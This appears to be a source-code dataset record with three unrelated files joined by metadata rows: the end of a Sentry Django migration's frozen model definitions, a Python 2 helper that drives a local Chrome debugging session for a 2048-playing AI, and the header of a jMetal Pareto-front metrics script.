'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.projectownership': {
'Meta': {'object_name': 'ProjectOwnership'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'fallthrough': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'raw': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'schema': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'})
},
'sentry.projectplatform': {
'Meta': {'unique_together': "(('project_id', 'platform'),)", 'object_name': 'ProjectPlatform'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.projectsymcachefile': {
'Meta': {'unique_together': "(('project', 'dsym_file'),)", 'object_name': 'ProjectSymCacheFile'},
'cache_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'dsym_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDSymFile']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.projectteam': {
'Meta': {'unique_together': "(('project', 'team'),)", 'object_name': 'ProjectTeam'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.pullrequest': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'PullRequest', 'db_table': "'sentry_pull_request'", 'index_together': "(('repository_id', 'date_added'),)"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'merge_commit_sha': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.rawevent': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'RawEvent'},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.release': {
'Meta': {'unique_together': "(('organization', 'version'),)", 'object_name': 'Release'},
'authors': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'commit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_released': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'last_deploy_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'blank': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'releases'", 'symmetrical': 'False', 'through': "orm['sentry.ReleaseProject']", 'to': "orm['sentry.Project']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'total_deploys': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'sentry.releasecommit': {
'Meta': {'unique_together': "(('release', 'commit'), ('release', 'order'))", 'object_name': 'ReleaseCommit'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseenvironment': {
'Meta': {'unique_together': "(('organization_id', 'release_id', 'environment_id'),)", 'object_name': 'ReleaseEnvironment', 'db_table': "'sentry_environmentrelease'"},
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.releasefile': {
'Meta': {'unique_together': "(('release', 'ident'),)", 'object_name': 'ReleaseFile'},
'dist': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Distribution']", 'null': 'True'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.TextField', [], {}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseheadcommit': {
'Meta': {'unique_together': "(('repository_id', 'release'),)", 'object_name': 'ReleaseHeadCommit'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.releaseproject': {
'Meta': {'unique_together': "(('project', 'release'),)", 'object_name': 'ReleaseProject', 'db_table': "'sentry_release_project'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseprojectenvironment': {
'Meta': {'unique_together': "(('project', 'release', 'environment'),)", 'object_name': 'ReleaseProjectEnvironment'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'new_issues_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.repository': {
'Meta': {'unique_together': "(('organization_id', 'name'), ('organization_id', 'provider', 'external_id'))", 'object_name': 'Repository'},
'config': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.reprocessingreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'ReprocessingReport'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.rule': {
'Meta': {'object_name': 'Rule'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.savedsearch': {
'Meta': {'unique_together': "(('project', 'name'),)", 'object_name': 'SavedSearch'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'query': ('django.db.models.fields.TextField', [], {})
},
'sentry.savedsearchuserdefault': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'SavedSearchUserDefault', 'db_table': "'sentry_savedsearch_userdefault'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'savedsearch': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.SavedSearch']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.scheduleddeletion': {
'Meta': {'unique_together': "(('app_label', 'model_name', 'object_id'),)", 'object_name': 'ScheduledDeletion'},
'aborted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2018, 4, 20, 0, 0)'}),
'guid': ('django.db.models.fields.CharField', [], {'default': "'4ab522335c9c457fa7b0e2dd43273c35'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'in_progress': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'model_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'object_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.scheduledjob': {
'Meta': {'object_name': 'ScheduledJob'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_scheduled': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'payload': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'})
},
'sentry.servicehook': {
'Meta': {'object_name': 'ServiceHook'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'events': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'8b4e9c643dd24b00b068654ee0ff4634471c8b810e234f96bce621e48c61df97'"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '512'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project_id', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project_id', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'", 'index_together': "(('project_id', 'key', 'last_seen'),)"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_password_expired': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_password_change': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_column': "'first_name'", 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'session_nonce': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useravatar': {
'Meta': {'object_name': 'UserAvatar'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'avatar'", 'unique': 'True', 'to': "orm['sentry.User']"})
},
'sentry.useremail': {
'Meta': {'unique_together': "(('user', 'email'),)", 'object_name': 'UserEmail'},
'date_hash_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'emails'", 'to': "orm['sentry.User']"}),
'validation_hash': ('django.db.models.fields.CharField', [], {'default': "u'v3MKTLoatafPf0YNZcPZiqcrK6rfsWTM'", 'max_length': '32'})
},
'sentry.userip': {
'Meta': {'unique_together': "(('user', 'ip_address'),)", 'object_name': 'UserIP'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'), ('user', 'organization', 'key'))", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.userpermission': {
'Meta': {'unique_together': "(('user', 'permission'),)", 'object_name': 'UserPermission'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'permission': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.userreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'UserReport', 'index_together': "(('project', 'event_id'), ('project', 'date_added'))"},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']", 'null': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'event_user_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.versiondsymfile': {
'Meta': {'unique_together': "(('dsym_file', 'version', 'build'),)", 'object_name': 'VersionDSymFile'},
'build': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dsym_app': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.DSymApp']"}),
'dsym_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDSymFile']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '32'})
}
}
complete_apps = ['sentry']
|
bsd-3-clause
| 9,205,398,465,352,764,000
| 90.668459
| 233
| 0.580878
| false
| 3.886559
| false
| false
| false
|
micahjonas/python-2048-ai
|
chromectrl.py
|
1
|
3685
|
import urllib, urllib2, json, threading, itertools
try:
import websocket
except ImportError:
websocket = None
class ChromeDebuggerControl(object):
''' Control Chrome using the debugging socket.
Chrome must be launched using the --remote-debugging-port=<port> option for this to work! '''
def __init__(self, port):
if websocket is None:
raise NotImplementedError("websocket-client library not available; cannot control Chrome.\n"
"Please install it (pip install websocket-client) then try again.")
# Obtain the list of pages
pages = json.loads(urllib2.urlopen('http://localhost:%d/json/list' % port).read())
if len(pages) == 0:
raise Exception("No pages to attach to!")
elif len(pages) == 1:
page = pages[0]
else:
print "Select a page to attach to:"
for i, page in enumerate(pages):
print "%d) %s" % (i+1, page['title'].encode('unicode_escape'))
while 1:
try:
pageidx = int(raw_input("Selection? "))
page = pages[pageidx-1]
break
except Exception, e:
print "Invalid selection:", e
# Configure debugging websocket
wsurl = page['webSocketDebuggerUrl']
self.ws = websocket.create_connection(wsurl)
self.requests = {} # dictionary containing in-flight requests
self.results = {}
self.req_counter = itertools.count(1)
self.thread = threading.Thread(target=self._receive_thread)
self.thread.daemon = True
self.thread.start()
self._send_cmd_noresult('Runtime.enable')
def _receive_thread(self):
''' Continually read events and command results '''
while 1:
try:
message = json.loads(self.ws.recv())
if 'id' in message:
id = message['id']
event = self.requests.pop(id, None)
if event is not None:
self.results[id] = message
event.set()
except Exception as e:
break
def _send_cmd_noresult(self, method, **params):
''' Send a command and ignore the result. '''
id = next(self.req_counter)
out = {'id': id, 'method': method}
if params:
out['params'] = params
self.ws.send(json.dumps(out))
def _send_cmd(self, method, **params):
''' Send a command and wait for the result to be available. '''
id = next(self.req_counter)
out = {'id': id, 'method': method}
if params:
out['params'] = params
# Receive thread will signal us when the response is available
event = threading.Event()
self.requests[id] = event
self.ws.send(json.dumps(out))
event.wait()
resp = self.results.pop(id)
if 'error' in resp:
raise Exception("Command %s(%s) failed: %s (%d)" % (
method, ', '.join('%s=%r' % (k,v) for k,v in params.iteritems()), resp['error']['message'], resp['error']['code']))
return resp['result']
def execute(self, cmd):
resp = self._send_cmd('Runtime.evaluate', expression=cmd)
#if resp['wasThrown']:
# raise Exception("JS evaluation threw an error: %s" % resp['result']['description'])
result = resp['result']
if 'value' in result:
return result['value']
if 'description' in result:
return result['description']
return None
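# Illustrative usage sketch, not part of the original module: the port number
# and the JavaScript expression below are hypothetical, and assume Chrome was
# launched with --remote-debugging-port=9222 as the class docstring requires.
if __name__ == '__main__':
    ctrl = ChromeDebuggerControl(9222)
    # evaluate an expression in the attached page and print its value
    print ctrl.execute('document.title')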
|
mit
| 258,010,317,988,155,460
| 36.222222
| 131
| 0.544369
| false
| 4.355792
| false
| false
| false
|
hpc-cecal-uy/pf_metrics
|
jmetal/pf_metrics.py
|
1
|
4208
|
# Copyright 2015 Renzo Massobrio
# Facultad de Ingenieria, UdelaR
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
############################################################################################################################
# INSTRUCTIONS
#
# Script to plot the global Pareto front and calculate generational distance, spread, spacing and relative hypervolume based
# on the pareto fronts output from jMetal (http://jmetal.sourceforge.net/).
#
# USAGE:
# python pf_metrics.py <path_to_results> <number_of_runs> <objective_1_name> <objective_2_name>
#
# To run the example:
# python pf_metrics.py example/ 5 obj1 obj2
#
# Notes:
# -<path_to_results> is the folder where the files "FUN.*" are located
# -<number_of_runs> is the number of runs executed. e.g.: if number_of_runs is 4 you should have FUN.0,...,FUN.3
# -<objective_J_name> is the label for the axis corresponding to objective J in the plot
#
# IMPORTANT: THIS SCRIPT ASSUMES MINIMIZATION OF BOTH OBJECTIVES. YOU SHOULD MODIFY THIS BEHAVIOUR TO FIT YOUR NEEDS.
#
# The metrics are calculated using the formulas in "Multiobjective optimization using Evolutionary Algorithms" from Kalyanmoy Deb.
